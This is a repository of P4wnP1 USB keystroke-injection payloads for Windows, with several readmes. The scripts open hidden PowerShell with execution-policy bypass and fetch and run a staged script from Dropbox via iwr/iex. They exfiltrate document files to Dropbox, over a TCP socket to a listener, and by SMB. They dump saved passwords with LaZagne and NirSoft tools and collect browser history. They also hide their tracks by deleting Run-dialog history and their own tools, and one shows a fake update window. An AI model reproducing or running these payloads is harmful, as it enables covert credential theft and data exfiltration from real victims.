├── Dropbox Exfiltration - Stealing files with Staged Powershell Payloads ├── demo.gif ├── exfil.ps1 ├── payload.js └── readme.md ├── Extract All Usernames & Passwords ├── Extract All Usernames & Passwords.js ├── TheRealAnnoyance.bat ├── invisible.vbs └── readme.md ├── One Line Powershell Wallpaper Changer ├── Line Powershell Wallpaper Changer.js ├── README.md ├── demo.gif └── wall.jpg ├── PasswordGrabber ├── PasswordGrabber.js ├── payload.ps1 └── readme.md ├── Powershell_TCP_Extractor ├── copyMoveData.ps1 ├── d.cmd ├── demo.gif ├── payload.js └── readme.md ├── SMB Exfiltrator ├── SMB_PAYLOAD.ps1 ├── payload.js └── readme.md ├── SmartFileExtract Exfiltrator ├── README.md ├── SmartFileExtract Exfiltration.js ├── d.cmd ├── demo.gif ├── e.cmd └── i.vbs ├── browserData ├── GetData.ps1 ├── demo.gif ├── payload.js └── readme.md └── lightning speed.js /Dropbox Exfiltration - Stealing files with Staged Powershell Payloads/demo.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/akhil1136/P4wnP1-ALOA-payloads/bf0b0b303e8a1e40353fa0622af7852516193e20/Dropbox Exfiltration - Stealing files with Staged Powershell Payloads/demo.gif -------------------------------------------------------------------------------- /Dropbox Exfiltration - Stealing files with Staged Powershell Payloads/exfil.ps1: -------------------------------------------------------------------------------- 1 | Compress-Archive -Path $env:USERPROFILE\Documents\*.docx -CompressionLevel NoCompression -DestinationPath $env:TMP\$env:USERNAME-$(get-date -f yyyy-MM-dd).zip 2 | $TargetFilePath="/$env:USERNAME-$(get-date -f yyyy-MM-dd).zip" 3 | $SourceFilePath="$env:TMP\$env:USERNAME-$(get-date -f yyyy-MM-dd).zip" 4 | $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' 5 | $authorization = "Bearer " + "PASTE YOUR Dropbox access token link" 6 | $headers = New-Object 
"System.Collections.Generic.Dictionary[[String],[String]]" 7 | $headers.Add("Authorization", $authorization) 8 | $headers.Add("Dropbox-API-Arg", $arg) 9 | $headers.Add("Content-Type", 'application/octet-stream') 10 | Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers 11 | rm $SourceFilePath -------------------------------------------------------------------------------- /Dropbox Exfiltration - Stealing files with Staged Powershell Payloads/payload.js: -------------------------------------------------------------------------------- 1 | 2 | //Dropbox Exfiltration - Stealing files with Staged Powershell Payloads 3 | layout('us'); 4 | typingSpeed(10,10) 5 | press("GUI r"); 6 | delay(500); 7 | type("powershell -w h -NoP -NonI -Exec Bypass \"$e=\\\"$env:TMP/e.ps1\\\";iwr (https://PASTE YOUR Dropbox link) -O $e;iex $e;rm $e\"\n") 8 | delay(1000); 9 | -------------------------------------------------------------------------------- /Dropbox Exfiltration - Stealing files with Staged Powershell Payloads/readme.md: -------------------------------------------------------------------------------- 1 | # Dropbox Exfiltrator 2 | 3 | 4 | This payload is not robust and is meant for demonstration purposes only. Known issues include the 150 MB file chunking limitation with Dropbox, as well as the IWR/IEX method and compression overhead. Please feel free to clean up. 5 | Description 6 | 7 | Staged powershell payload which downloads and executes exfil.ps1 from dropbox which compresses the users documents folder and uploads it to dropbox. 8 | Requirements 9 | 10 | Step 1. Create a Dropbox app using their API and generate an access token from https://www.dropbox.com/developers/apps/create 11 | Step 2. Customize the powershell exfil.ps1 file to exfiltrate the loot to Dropbox using the token generated above 12 | Step 3. 
Get a direct dropbox link for the powershell file (right-click exfil.ps1, get dropbox link, replace dl=0 with dl=1) 13 | Step 4. Customize the exfiltration payload.txt to use the dropbox link from above 14 | 15 | 16 | ![](./demo.gif) 17 | -------------------------------------------------------------------------------- /Extract All Usernames & Passwords/Extract All Usernames & Passwords.js: -------------------------------------------------------------------------------- 1 | layout("us"); // US keyboard layout 2 | press("WIN"); 3 | delay(250); 4 | type("powershell"); 5 | delay(250); 6 | press("CTRL SHIFT ENTER"); 7 | delay(1500); 8 | press("ALT y"); 9 | delay(2000); 10 | type("$usbPath =((gwmi win32_volume -f 'label=''P4WNP1''').Name+'Tools\')\n"); 11 | delay(250); 12 | type("cd $usbPath\n"); 13 | delay(250); 14 | type("Expand-Archive Private.zip\n"); 15 | delay(2000); 16 | type("cd Private\n"); 17 | delay(250); 18 | type("C:/windows/System32/wscript.exe invisible.vbs TheRealAnnoyance.bat\n"); 19 | delay(2500); 20 | type("exit\n"); 21 | delay(250); -------------------------------------------------------------------------------- /Extract All Usernames & Passwords/TheRealAnnoyance.bat: -------------------------------------------------------------------------------- 1 | timeout 3 2 | %~dp0/WebBrowserPassView.exe /stext WebBrowserPassView.txt 3 | %~dp0/SkypeLogView.exe /stext SkypeLogView.txt 4 | %~dp0/RouterPassView.exe /stext RouterPassView.txt 5 | %~dp0/pspv.exe /stext pspv.txt 6 | %~dp0/PasswordFox.exe /stext PasswordFox.txt 7 | %~dp0/OperaPassView.exe /stext OperaPassView.txt 8 | %~dp0/mspass.exe /stext mspass.txt 9 | %~dp0/mailpv.exe /stext mailpv.txt 10 | %~dp0/iepv.exe /stext iepv.txt 11 | %~dp0/ChromePass.exe /stext ChromePass.txt 12 | %~dp0/ChromeHistoryView.exe /stext ChromeHistoryView.txt 13 | %~dp0/BulletsPassView.exe /stext BulletsPassView.txt 14 | %~dp0/BrowsingHistoryView.exe /stext BrowsingHistoryView.txt 15 | %~dp0/WirelessKeyView.exe /stext 
WirelessKeyView.txt 16 | %~dp0/netpass.exe /stext netpass.txt 17 | %~dp0/Dialupass.exe /stext Dialupass.txt 18 | %~dp0/WirelessKeyView.exe /stext WirelessKeyView.txt 19 | 20 | del /S WebBrowserPassView.exe && ECHO Y 21 | del /S SkypeLogView.exe && ECHO Y 22 | del /S RouterPassView.exe && ECHO Y 23 | del /S pspv.exe && ECHO Y 24 | del /S PasswordFox.exe && ECHO Y 25 | del /S OperaPassView.exe && ECHO Y 26 | del /S mspass.exe && ECHO Y 27 | del /S mailpv.exe && ECHO Y 28 | del /S iepv.exe && ECHO Y 29 | del /S ChromePass.exe && ECHO Y 30 | del /S ChromeHistoryView.exe && ECHO Y 31 | del /S BulletsPassView.exe && ECHO Y 32 | del /S BrowsingHistoryView.exe && ECHO Y 33 | del /S WirelessKeyView.exe && ECHO Y 34 | del /S netpass.exe && ECHO Y 35 | del /S Dialupass.exe && ECHO Y 36 | del /S SniffPass.exe && ECHO Y 37 | del /S PasswordFox64.exe && ECHO Y 38 | del /S invisible.vbs && ECHO Y 39 | del /S TheRealAnnoyance.bat && ECHO Y 40 | 41 | 42 | -------------------------------------------------------------------------------- /Extract All Usernames & Passwords/invisible.vbs: -------------------------------------------------------------------------------- 1 | CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False -------------------------------------------------------------------------------- /Extract All Usernames & Passwords/readme.md: -------------------------------------------------------------------------------- 1 | # Extract All Usernames & Passwords 2 | ![alt tag](https://pbs.twimg.com/profile_images/2985303821/f913499629cb67c4277af708404504e3_400x400.jpeg) 3 | ## Description 4 | powerful little tools and created an executable batch file extract any Wi-Fi, internet browser, mail account, Windows Login, Skype, Remote Desktop, Windows bullet form, messenger, LAN, router and many more usernames and passwords that are saved in a computer that you’re going to be using this USB mass storage 5 | 6 | Private zip Download link 
https://tinyurl.com/y3pdajm5 7 | password 12345 8 | You need to download the lastest file from http://www.nirsoft.net/password_recovery_tools.html 9 | -------------------------------------------------------------------------------- /One Line Powershell Wallpaper Changer/Line Powershell Wallpaper Changer.js: -------------------------------------------------------------------------------- 1 | //One Line Powershell Wallpaper Changer 2 | layout('us'); 3 | typingSpeed(0,0) 4 | press("GUI r"); 5 | delay(500); 6 | type(" powershell -w h \"$p=$home+'\\b.jpg';iwr https://bit.ly/2SrQzNT -O $p;SP 'HKCU:Control Panel\\Desktop' WallPaper $p;1..59|%{RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters ,1 ,True;sleep 1}\"\n") 7 | delay(1000); 8 | -------------------------------------------------------------------------------- /One Line Powershell Wallpaper Changer/README.md: -------------------------------------------------------------------------------- 1 | # One Line Powershell Wallpaper Changer 2 | ![](./wall.jpg) 3 | ## Description 4 | Single stage powershell one-liner executes from run dialog. 
CMD opens a hide powershell window which downloads b.jpg (change this URL) to C:\Users\Username then sets the registry entry to change the wallpaper, then finally loops over an undocumented USER32.DLL feature for 60 seconds to force a user profile ref 5 | 6 | ## Demo 7 | ![](./demo.gif) 8 | -------------------------------------------------------------------------------- /One Line Powershell Wallpaper Changer/demo.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/akhil1136/P4wnP1-ALOA-payloads/bf0b0b303e8a1e40353fa0622af7852516193e20/One Line Powershell Wallpaper Changer/demo.gif -------------------------------------------------------------------------------- /One Line Powershell Wallpaper Changer/wall.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/akhil1136/P4wnP1-ALOA-payloads/bf0b0b303e8a1e40353fa0622af7852516193e20/One Line Powershell Wallpaper Changer/wall.jpg -------------------------------------------------------------------------------- /PasswordGrabber/PasswordGrabber.js: -------------------------------------------------------------------------------- 1 | layout('us'); // US keyboard layout 2 | typingSpeed(0,0) 3 | press("GUI r"); 4 | delay(500); 5 | type("cmd /C start /MIN powershell -executionpolicy Bypass .((gwmi win32_volume -f 'label=''P4WNP1''').Name+'\\payload\\payload.ps1')\n") 6 | delay(1000); 7 | -------------------------------------------------------------------------------- /PasswordGrabber/payload.ps1: -------------------------------------------------------------------------------- 1 | $dest = ((Get-WmiObject win32_volume -f 'label=''P4WNP1''').Name+'loot\PasswordGrabber') 2 | $filter = 'password_'+ $env:COMPUTERNAME 3 | $filecount = ((Get-ChildItem -filter ($filter + "*") -path $dest | Measure-Object | Select -ExpandProperty Count) + 1) 4 | Start-Process -WindowStyle Hidden -FilePath ((Get-WmiObject 
win32_volume -f 'label=''P4WNP1''').Name+'tools\laZagne.exe') -ArgumentList 'all -vv' -RedirectStandardOutput ($dest +'\' + $filter +'_' + $filecount +'.txt') 5 | Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue 6 | -------------------------------------------------------------------------------- /PasswordGrabber/readme.md: -------------------------------------------------------------------------------- 1 | 2 | # PasswordGrabber 3 | ![alt tag](https://pngimage.net/wp-content/uploads/2018/06/hand-cursor-icon-png-6.png) 4 | 5 | 6 | Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more... 7 | 8 | ## Description 9 | The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext, APIs, custom algorithms, databases, etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software. 10 | 11 | Full read here https://github.com/AlessandroZ/LaZagne 12 | 13 | ### Configuration 14 | 15 | 1. You need to download the lastest file from LaZagne release page.https://github.com/AlessandroZ/LaZagne 16 | 2. Drive name should be"P4WNP1".Add 3 folders. Unzip the exe file and place it in the tools folder. The payload folder should contain all the files that are in this payload and the LaZagne.exe 17 | 18 | 19 | https://ibb.co/3cyLcF7 20 | https://ibb.co/YymT7WQ 21 | 22 | i'm not responsible on usage you do with it this is for eduational purpose only 23 | 24 | ## remember all my payloads are in US kerboard layout 25 | -------------------------------------------------------------------------------- /Powershell_TCP_Extractor/copyMoveData.ps1: -------------------------------------------------------------------------------- 1 | #edit ip and port of your listener... 
listener is on the machine you want to send data to... I use netcat as listener... (example command on kali.. [nc -l -p 54321 > out.file]) 2 | [int] $Port = 54321 3 | $IP = "172.16.0.1" 4 | #edit this to specify your target 5 | #$rootFolder = "$ENV:UserProfile\Documents" 6 | $rootFolder = "E:\" 7 | #edit include to specify filetypes...(*.doc*,*.txt,*.jpg) whatevs... 8 | $files = Get-ChildItem -Path $rootFolder -Include *.txt -Recurse 9 | 10 | #only edit under this if you know what you are doing 11 | #temp location to perform file copy and zip 12 | $tempFolderRoot = $env:APPDATA 13 | $tempFolderFinal = $tempFolderRoot+"\"+$env:UserName+"-Docs" 14 | New-Item -ItemType directory -Path $tempFolderFinal -Force 15 | foreach($file in $files) 16 | {Copy-Item "$file" -destination $tempFolderFinal} 17 | $CompressionToUse = [System.IO.Compression.CompressionLevel]::Fastest 18 | $IncludeBaseFolder = $false 19 | $zipTo = "{0}\{1}.zip" -f $tempFolderRoot,"ZIPPED" 20 | [Reflection.Assembly]::LoadWithPartialName( "System.IO.Compression.FileSystem" ) 21 | [System.IO.Compression.ZipFile]::CreateFromDirectory($tempFolderFinal, $ZipTo, $CompressionToUse, $IncludeBaseFolder) 22 | $Address = [system.net.IPAddress]::Parse($IP) 23 | $socket = new-object System.Net.Sockets.TcpClient 24 | $socket.connect($Address, $port) 25 | $stream = $socket.GetStream() 26 | $file = Get-Item $Env:APPDATA\ZIPPED.zip 27 | $fileData = [IO.File]::ReadAllBytes($file) 28 | $stream.Write($fileData, 0, $fileData.Length) 29 | $stream.Close() 30 | $Socket.Close() 31 | 32 | #clean up temp files 33 | Remove-Item $tempFolderFinal -RECURSE 34 | Remove-Item $Env:APPDATA\ZIPPED.zip 35 | -------------------------------------------------------------------------------- /Powershell_TCP_Extractor/d.cmd: -------------------------------------------------------------------------------- 1 | @echo off 2 | 3 | Rem run powershell script with bypass,nologo, and hidden flag 4 | Start "" powershell.exe -ExecutionPolicy Bypass -nologo 
-WindowStyle Hidden -File %~dp0\copyMoveData.ps1 5 | 6 | REM Delete registry key storing Run dialog history...to clean up evidence 7 | REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f 8 | 9 | @cls 10 | @exit -------------------------------------------------------------------------------- /Powershell_TCP_Extractor/demo.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/akhil1136/P4wnP1-ALOA-payloads/bf0b0b303e8a1e40353fa0622af7852516193e20/Powershell_TCP_Extractor/demo.gif -------------------------------------------------------------------------------- /Powershell_TCP_Extractor/payload.js: -------------------------------------------------------------------------------- 1 | //Powershell_TCP_Extractor 2 | layout('us'); 3 | typingSpeed(0,0) 4 | press("GUI r"); 5 | delay(500); 6 | type("powershell -w h \".((gwmi win32_volume -f 'label=''P4WNP1''').Name+'Powershell_TCP_Extractor\\d.cmd')\"\n") 7 | delay(1000); 8 | -------------------------------------------------------------------------------- /Powershell_TCP_Extractor/readme.md: -------------------------------------------------------------------------------- 1 | # Powershell TCP extractor 2 | 3 | 4 | ## Description 5 | 6 | Copies data to temp directory and uses powershell tcp socket to extract to a listener on remote machine 7 | 8 | ## Output 9 | 10 | nc -l -p 54321 > ZIPPED.zip 11 | 12 | ## demo 13 | ![](./demo.gif) 14 | -------------------------------------------------------------------------------- /SMB Exfiltrator/SMB_PAYLOAD.ps1: -------------------------------------------------------------------------------- 1 | $exfil_dir="$Env:UserProfile\Documents" 2 | $exfil_ext="*.docx" 3 | $loot_dir="\\172.16.0.1\Data\$Env:ComputerName\$((Get-Date).ToString('yyyy-MM-dd_hhmmtt'))" 4 | net use \\172.16.0.1\Data /USER:any any; 5 | mkdir $loot_dir 6 | robocopy $exfil_dir $loot_dir $exfil_ext /S /MT /Z 7 | 
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue 8 | -------------------------------------------------------------------------------- /SMB Exfiltrator/payload.js: -------------------------------------------------------------------------------- 1 | //SMB_PAYLOAD 2 | layout('us'); 3 | typingSpeed(0,0) 4 | press("GUI r"); 5 | delay(500); 6 | type("cmd /C start /MIN powershell -executionpolicy Bypass .((gwmi win32_volume -f 'label=''P4WNP1''').Name+'\\payload\\SMB_PAYLOAD.ps1')\n") 7 | delay(1000); 8 | -------------------------------------------------------------------------------- /SMB Exfiltrator/readme.md: -------------------------------------------------------------------------------- 1 | 2 | # Faster SMB Exfiltrator 3 | 4 | 5 | ## Description 6 | 7 | Exfiltrates select files from users's documents folder via SMB. 8 | Liberated documents will reside in PWNPI loot directory under /Data/HOSTNAME/DATE_TIME 9 | 10 | * Faster copying, using robocopy multithreaded mode 11 | * Faster finish, using a EXFILTRATION_COMPLETE file 12 | * Offload logic to target PC for accurate date/time 13 | * Clears tracks by default without second run dialog 14 | * Hidden powershell window by default 15 | 16 | ## REQUIREMENTS 17 | 18 | 1. Download impacket from https://github.com/CoreSecurity/impacket 19 | 2. goto cd impacket/ 20 | 3. install "python setup.py install" 21 | 22 | ## Configuration 23 | 1.create folder root directory mkdir /Data give full permissions chmod +x /Data 24 | 25 | 2.goto impacket/examples run this command "./smbserver.py -comment 'My share' -username any -password any -smb2support Data /Datasmbserver.py -comment 'My share' -username any -password any -smb2support Data /Data" 26 | 27 | 3.Configured to copy .docx files by default. Change $exfil_ext in s.ps1 to desired. 
28 | 29 | 30 | 31 | ## I'm not responsible for any use you make of this; it is for educational purposes only 32 | 33 | ## Remember: all my payloads assume a US keyboard layout 34 | -------------------------------------------------------------------------------- /SmartFileExtract Exfiltrator/README.md: -------------------------------------------------------------------------------- 1 | # SmartFileExtract Exfiltrator 2 | SmartFileExtract is a find-and-copy utility written specifically for the Hak5 BashBunny but is also usable as a standalone utility. Files are found by standard patterns (including wildcards) and then copied to any valid path. 3 | 4 | - Finds all files with a) the word secret or pass in the filename as well as b) any DOCX files 5 | - Reports status as a fake install window 6 | - Stops extracting after 90 seconds or 500 MB 7 | 8 | Setup: 9 | - Download the SmartFileExtract utility from https://github.com/saintcrossbow/SmartFileExtract 10 | * Quick tip: you only need the SmartFileExtract.exe from the project; copy it to "P4WNP1" SmartFile\ 11 | 12 | 13 | ## File Extensions 14 | 15 | 1 *.DOC and .DOCX Microsoft Word documents. 
16 | 2 *.PDF PDF files 17 | 3 *.XLS and .XLSX Microsoft Excel 18 | 4 *.PPT and .PPTX Microsoft PowerPoint 19 | 20 | 21 | ![](./demo.gif) 22 | -------------------------------------------------------------------------------- /SmartFileExtract Exfiltrator/SmartFileExtract Exfiltration.js: -------------------------------------------------------------------------------- 1 | SmartFileExtract Forensics and Exfiltration 2 | layout('us'); // US keyboard layout 3 | typingSpeed(0,0) 4 | press("GUI r"); 5 | delay(500); 6 | type("cmd /C start /MIN powershell -executionpolicy Bypass .((gwmi win32_volume -f 'label=''P4WNP1''').Name+'\\SmartFile\\d.cmd')\n") 7 | delay(1000); -------------------------------------------------------------------------------- /SmartFileExtract Exfiltrator/d.cmd: -------------------------------------------------------------------------------- 1 | @echo off 2 | start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell" 3 | cscript %~dp0\i.vbs %~dp0\e.cmd 4 | @exit -------------------------------------------------------------------------------- /SmartFileExtract Exfiltrator/demo.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/akhil1136/P4wnP1-ALOA-payloads/bf0b0b303e8a1e40353fa0622af7852516193e20/SmartFileExtract Exfiltrator/demo.gif -------------------------------------------------------------------------------- /SmartFileExtract Exfiltrator/e.cmd: -------------------------------------------------------------------------------- 1 | REM Setup required: 2 | REM o Create SFE in the loot directory 3 | REM o Place SmartFileExtract on the root of the bashbunny 4 | @echo off 5 | @echo Installing Windows Update 6 | 7 | REM Delete registry keys storing Run dialog history 8 | REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f 9 | 10 | REM Creates directory compromised of computer name, date and 
time 11 | REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious 12 | set dst=%~dp0\..\..\loot\SFE\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2% 13 | mkdir %dst% >>nul 14 | 15 | 16 | if Exist %USERPROFILE%\Documents ( %~dp0\..\..\SmartFile\SmartFileExtract.exe /drive d /file *.doc;*pass*.*;*secret* /copyto %dst% /curtain 3 /maxsec 90 /maxmbs 500 >>nul ) 17 | 18 | REM Blink CAPSLOCK key 19 | start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')" 20 | 21 | @cls 22 | @exit -------------------------------------------------------------------------------- /SmartFileExtract Exfiltrator/i.vbs: -------------------------------------------------------------------------------- 1 | CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False -------------------------------------------------------------------------------- /browserData/GetData.ps1: -------------------------------------------------------------------------------- 1 | function Get-BrowserInformation { 2 | <# 3 | .SYNOPSIS 4 | 5 | Dumps Browser Information 6 | Author: @424f424f 7 | License: BSD 3-Clause 8 | Required Dependencies: None 9 | Optional Dependencies: None 10 | 11 | .DESCRIPTION 12 | 13 | Enumerates browser history or bookmarks for a Chrome, Internet Explorer, 14 | and/or Firefox browsers on Windows machines. 15 | 16 | .PARAMETER Browser 17 | 18 | The type of browser to enumerate, 'Chrome', 'IE', 'Firefox' or 'All' 19 | 20 | .PARAMETER Datatype 21 | 22 | Type of data to enumerate, 'History' or 'Bookmarks' 23 | 24 | .PARAMETER UserName 25 | 26 | Specific username to search browser information for. 
27 | 28 | .PARAMETER Search 29 | 30 | Term to search for 31 | 32 | .EXAMPLE 33 | 34 | PS C:\> Get-BrowserInformation 35 | 36 | Enumerates browser information for all supported browsers for all current users. 37 | 38 | .EXAMPLE 39 | 40 | PS C:\> Get-BrowserInformation -Browser IE -Datatype Bookmarks -UserName user1 41 | 42 | Enumerates bookmarks for Internet Explorer for the user 'user1'. 43 | 44 | .EXAMPLE 45 | 46 | PS C:\> Get-BrowserInformation -Browser All -Datatype History -UserName user1 -Search 'github' 47 | 48 | Enumerates bookmarks for Internet Explorer for the user 'user1' and only returns 49 | results matching the search term 'github'. 50 | #> 51 | [CmdletBinding()] 52 | Param 53 | ( 54 | [Parameter(Position = 0)] 55 | [String[]] 56 | [ValidateSet('Chrome','IE','FireFox', 'All')] 57 | $Browser = 'All', 58 | 59 | [Parameter(Position = 1)] 60 | [String[]] 61 | [ValidateSet('History','Bookmarks','All')] 62 | $DataType = 'All', 63 | 64 | [Parameter(Position = 2)] 65 | [String] 66 | $UserName = '', 67 | 68 | [Parameter(Position = 3)] 69 | [String] 70 | $Search = '' 71 | ) 72 | 73 | 74 | 75 | function ConvertFrom-Json20([object] $item){ 76 | #http://stackoverflow.com/a/29689642 77 | Add-Type -AssemblyName System.Web.Extensions 78 | $ps_js = New-Object System.Web.Script.Serialization.JavaScriptSerializer 79 | return ,$ps_js.DeserializeObject($item) 80 | 81 | } 82 | 83 | function Get-ChromeHistory { 84 | $Path = "$Env:systemdrive\Users\$UserName\AppData\Local\Google\Chrome\User Data\Default\History" 85 | if (-not (Test-Path -Path $Path)) { 86 | Write-Verbose "[!] Could not find Chrome History for username: $UserName" 87 | } 88 | $Regex = '(htt(p|s))://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?' 
89 | $Value = Get-Content -Path "$Env:systemdrive\Users\$UserName\AppData\Local\Google\Chrome\User Data\Default\History"|Select-String -AllMatches $regex |% {($_.Matches).Value} |Sort -Unique 90 | $Value | ForEach-Object { 91 | $Key = $_ 92 | if ($Key -match $Search){ 93 | New-Object -TypeName PSObject -Property @{ 94 | User = $UserName 95 | Browser = 'Chrome' 96 | DataType = 'History' 97 | Data = $_ 98 | } 99 | } 100 | } 101 | } 102 | 103 | function Get-ChromeBookmarks { 104 | $Path = "$Env:systemdrive\Users\$UserName\AppData\Local\Google\Chrome\User Data\Default\Bookmarks" 105 | if (-not (Test-Path -Path $Path)) { 106 | Write-Verbose "[!] Could not find FireFox Bookmarks for username: $UserName" 107 | } else { 108 | $Json = Get-Content $Path 109 | $Output = ConvertFrom-Json20($Json) 110 | $Jsonobject = $Output.roots.bookmark_bar.children 111 | $Jsonobject.url |Sort -Unique | ForEach-Object { 112 | if ($_ -match $Search) { 113 | New-Object -TypeName PSObject -Property @{ 114 | User = $UserName 115 | Browser = 'Firefox' 116 | DataType = 'Bookmark' 117 | Data = $_ 118 | } 119 | } 120 | } 121 | } 122 | } 123 | 124 | function Get-InternetExplorerHistory { 125 | #https://crucialsecurityblog.harris.com/2011/03/14/typedurls-part-1/ 126 | 127 | $Null = New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS 128 | $Paths = Get-ChildItem 'HKU:\' -ErrorAction SilentlyContinue | Where-Object { $_.Name -match 'S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+$' } 129 | 130 | ForEach($Path in $Paths) { 131 | 132 | $User = ([System.Security.Principal.SecurityIdentifier] $Path.PSChildName).Translate( [System.Security.Principal.NTAccount]) | Select -ExpandProperty Value 133 | 134 | $Path = $Path | Select-Object -ExpandProperty PSPath 135 | 136 | $UserPath = "$Path\Software\Microsoft\Internet Explorer\TypedURLs" 137 | if (-not (Test-Path -Path $UserPath)) { 138 | Write-Verbose "[!] 
Could not find IE History for SID: $Path" 139 | } 140 | else { 141 | Get-Item -Path $UserPath -ErrorAction SilentlyContinue | ForEach-Object { 142 | $Key = $_ 143 | $Key.GetValueNames() | ForEach-Object { 144 | $Value = $Key.GetValue($_) 145 | if ($Value -match $Search) { 146 | New-Object -TypeName PSObject -Property @{ 147 | User = $UserName 148 | Browser = 'IE' 149 | DataType = 'History' 150 | Data = $Value 151 | } 152 | } 153 | } 154 | } 155 | } 156 | } 157 | } 158 | 159 | function Get-InternetExplorerBookmarks { 160 | $URLs = Get-ChildItem -Path "$Env:systemdrive\Users\" -Filter "*.url" -Recurse -ErrorAction SilentlyContinue 161 | ForEach ($URL in $URLs) { 162 | if ($URL.FullName -match 'Favorites') { 163 | $User = $URL.FullName.split('\')[2] 164 | Get-Content -Path $URL.FullName | ForEach-Object { 165 | try { 166 | if ($_.StartsWith('URL')) { 167 | # parse the .url body to extract the actual bookmark location 168 | $URL = $_.Substring($_.IndexOf('=') + 1) 169 | 170 | if($URL -match $Search) { 171 | New-Object -TypeName PSObject -Property @{ 172 | User = $User 173 | Browser = 'IE' 174 | DataType = 'Bookmark' 175 | Data = $URL 176 | } 177 | } 178 | } 179 | } 180 | catch { 181 | Write-Verbose "Error parsing url: $_" 182 | } 183 | } 184 | } 185 | } 186 | } 187 | 188 | function Get-FireFoxHistory { 189 | $Path = "$Env:systemdrive\Users\$UserName\AppData\Roaming\Mozilla\Firefox\Profiles\" 190 | if (-not (Test-Path -Path $Path)) { 191 | Write-Verbose "[!] Could not find FireFox History for username: $UserName" 192 | } 193 | else { 194 | $Profiles = Get-ChildItem -Path "$Path\*.default\" -ErrorAction SilentlyContinue 195 | $Regex = '(htt(p|s))://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?' 
196 | $Value = Get-Content $Profiles\places.sqlite | Select-String -Pattern $Regex -AllMatches |Select-Object -ExpandProperty Matches |Sort -Unique 197 | $Value.Value |ForEach-Object { 198 | if ($_ -match $Search) { 199 | ForEach-Object { 200 | New-Object -TypeName PSObject -Property @{ 201 | User = $UserName 202 | Browser = 'Firefox' 203 | DataType = 'History' 204 | Data = $_ 205 | } 206 | } 207 | } 208 | } 209 | } 210 | } 211 | 212 | if (!$UserName) { 213 | $UserName = "$ENV:USERNAME" 214 | } 215 | 216 | if(($Browser -Contains 'All') -or ($Browser -Contains 'Chrome')) { 217 | if (($DataType -Contains 'All') -or ($DataType -Contains 'History')) { 218 | Get-ChromeHistory 219 | } 220 | if (($DataType -Contains 'All') -or ($DataType -Contains 'Bookmarks')) { 221 | Get-ChromeBookmarks 222 | } 223 | } 224 | 225 | if(($Browser -Contains 'All') -or ($Browser -Contains 'IE')) { 226 | if (($DataType -Contains 'All') -or ($DataType -Contains 'History')) { 227 | Get-InternetExplorerHistory 228 | } 229 | if (($DataType -Contains 'All') -or ($DataType -Contains 'Bookmarks')) { 230 | Get-InternetExplorerBookmarks 231 | } 232 | } 233 | 234 | if(($Browser -Contains 'All') -or ($Browser -Contains 'FireFox')) { 235 | if (($DataType -Contains 'All') -or ($DataType -Contains 'History')) { 236 | Get-FireFoxHistory 237 | } 238 | } 239 | } 240 | Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue -------------------------------------------------------------------------------- /browserData/demo.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/akhil1136/P4wnP1-ALOA-payloads/bf0b0b303e8a1e40353fa0622af7852516193e20/browserData/demo.gif -------------------------------------------------------------------------------- /browserData/payload.js: -------------------------------------------------------------------------------- 1 | //BrowserData 
History 2 | layout('us'); 3 | typingSpeed(0,0) 4 | press("GUI r"); 5 | delay(500); 6 | type("powershell -w h \".((gwmi win32_volume -f 'label=''P4WNP1''').Name+'browserData\\GetData.ps1')\"; $b =(gwmi win32_volume -f 'label=''P4WNP1''' | Select-Object -ExpandProperty DriveLetter); Get-BrowserInformation | Out-File -Append $b\\loot\\$env:computername.txt\"\n") 7 | delay(1000); 8 | -------------------------------------------------------------------------------- /browserData/readme.md: -------------------------------------------------------------------------------- 1 | ## BrowserData History Exfiltration 2 | 3 | 4 | ## Demo 5 | ![](./demo.gif) -------------------------------------------------------------------------------- /lightning speed.js: -------------------------------------------------------------------------------- 1 | //lightning speed move powershell or cmd 2 | function win10AsAdmin() { 3 | press("GUI"); //open search 4 | delay(200); 5 | type("powershell"); //powershell 6 | delay(500); // wait for search to finish 7 | press("CTRL SHIFT ENTER"); //start with CTRL+SHIFT+ENTER (run as admin) 8 | delay(1000); //wait for confirmation dialog (no check if a password is required, assume login user is admin) 9 | press("SHIFT TAB"); //switch to dialog confirmation 10 | press("ENTER"); 11 | } 12 | 